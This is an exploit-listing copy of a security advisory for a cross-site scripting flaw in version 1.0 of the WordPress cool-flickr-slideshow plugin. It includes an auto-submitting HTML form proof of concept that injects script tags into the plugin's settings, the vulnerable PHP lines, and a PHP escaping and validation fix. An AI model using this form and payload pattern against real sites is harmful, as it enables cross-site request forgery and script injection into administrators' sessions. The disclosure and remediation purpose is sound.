Wordpress cool-flickr-slideshow Plugin Cross Site Scripting(xss)

CVE: CVE-2020-12800
Category: CWE-79
Price: $500
Severity: High
Author: Unknown
Risk: High
Exploitation Type: Remote
Date: 2017-09-07
CVSS: CVSS:4.0/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N
EPSS: 0.02192
EPSSP: 0.50148

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2017090043

Below is a copy:

 ___________________________________________________
|
| Exploit Title: Wordpress cool-flickr-slideshow Plugin Cross Site Scripting(xss)
| Exploit Author: Ashiyane Digital security Team
| Vendor Homepage: https://wordpress.org/plugins/cool-flickr-slideshow/
| Software Link: https://downloads.wordpress.org/plugin/cool-flickr-slideshow.1.0.zip
| Version: 1.0
| Date: 2017 - 07 - 9
| Tested on: Kali Linux / Firefox
|__________________________________________________

 Exploit :
 
<form name="form1" method="POST" Action="http://127.0.0.1/wordpress/wp-admin/admin.php?page=flickr-gallery-settings">
<input type="hidden" name="flickr-gallery_hidden" value="Y" />
<input type="hidden" name="flickr_type" value='"><script>alert("xss1")</script>' />
<input type="hidden" name="flickr_uid" value="1" />
<input type="hidden" name="flickr_api" value="MMM" />
<input type="hidden" name="flickr_groupid" value='1' />
<input type="hidden" name="flickr_set" value="" />
<input type="hidden" name="flickr_width" value='"><script>alert("xss 2")</script>' />
<input type="hidden" name="flickr_height" value='"><script>alert("xss 3")</script>' />
<input type="hidden" name="Submit" value="Save" />
</form>
<script language="javascript">
setTimeout('form1.submit()', 1);
</script>

__________________________________________________


 Vulnerable File :
     /wp-content/plugins/cool-flickr-slideshow/flickr_gallery_admin.php

 Vulnerable code:
 
 
line 154 :
<select id="flickr_type" name="flickr_type" onchange="javascript:ChangeFlickrType(this.value);">
       <option selected="" value=""/><script>alert(1000)</script>">SELECT</option>
       <option value="user">User</option>
       <option value="group">Group</option>
       <option value="set">Set</option>
       <option value="api">API</option>
</select>
  
line 185 :
<p><span style="width: 75px;float: left;"><?php _e("Width: " ); ?>
</span><input type="text" name="flickr_width" value="<?php echo $flickr_width; ?>" size="20"></p>


line 186 :
<p><span style="width: 75px;float: left;"><?php _e("Height: " ); ?>
</span><input type="text" name="flickr_height" value="<?php echo $flickr_height; ?>" size="20"></p>
  
  
__________________________________________________

#patch:
To fix this vulnerability, pass the values through the htmlspecialchars() function before echoing them.
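
The escaping fix above, as an added example (not the plugin's or the advisory author's code): plain PHP that escapes the value attributes shown at lines 185 and 186 and validates the three injected settings before they are saved. The helper names and the sample input are constructed; the allow-list is taken from the option values shown at line 154.

```php
<?php
// Added example, not the plugin's code. Field names come from the advisory;
// helper names and the sample values below are constructed.

const FLICKR_TYPES = ['user', 'group', 'set', 'api']; // <option> values at line 154

// Validate on save: keep only a known type and short all-digit dimensions.
function sanitize_flickr_settings(array $post): array
{
    $type = (string) ($post['flickr_type'] ?? '');
    $dim = static function (string $key) use ($post): string {
        $v = trim((string) ($post[$key] ?? ''));
        return preg_match('/^\d{1,5}$/', $v) === 1 ? $v : '';
    };
    return [
        'flickr_type'   => in_array($type, FLICKR_TYPES, true) ? $type : '',
        'flickr_width'  => $dim('flickr_width'),
        'flickr_height' => $dim('flickr_height'),
    ];
}

// Escape on output: ENT_QUOTES encodes both quote styles, so a stored value
// cannot close the value="..." attribute. In WordPress, esc_attr() does this job.
function attr(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');
}

function render_width_field(string $width): string
{
    return '<input type="text" name="flickr_width" value="' . attr($width) . '" size="20">';
}

// Constructed input mirroring the advisory's POST body.
$post = [
    'flickr_type'   => '"><script>alert("xss1")</script>',
    'flickr_width'  => '"><script>alert("xss 2")</script>',
    'flickr_height' => '480',
];

// 1) Escaping alone: the raw payload is rendered as inert attribute text.
echo render_width_field($post['flickr_width']), PHP_EOL;

// 2) Validation before storage: the two payloads are dropped, 480 is kept.
$clean = sanitize_flickr_settings($post);
echo render_width_field($clean['flickr_width']), PHP_EOL;
var_export($clean);
echo PHP_EOL;
```

Because the proof of concept auto-submits the settings form from another page, a WordPress nonce check (wp_nonce_field() in the form, check_admin_referer() in the save handler) is the complementary control.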
__________________________________________________

Discovered By : M.R.S.L.Y 
__________________________________________________


